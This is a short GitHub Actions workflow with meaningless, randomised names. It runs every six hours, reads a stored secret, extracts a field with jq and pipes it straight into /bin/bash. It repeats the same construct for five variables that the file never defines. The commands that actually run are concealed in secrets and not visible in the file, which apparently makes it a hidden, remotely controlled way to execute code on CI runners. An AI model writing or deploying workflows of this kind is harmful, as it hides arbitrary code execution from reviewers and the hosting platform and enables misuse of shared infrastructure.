name: gelubang0987

on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gelubang0987
        env:
          hfkp73: ${{ secrets.hfkp73 }}
        run: |
          echo $hfkp73 | jq -r .gozy80349 | /bin/bash
          echo $dbubc039 | jq -r .u07 | /bin/bash
          echo $c434 | jq -r .fq0029 | /bin/bash
          echo $l424 | jq -r .pwev37027 | /bin/bash
          echo $qu7 | jq -r .lsb3 | /bin/bash
          echo $kv04935 | jq -r .t29 | /bin/bash

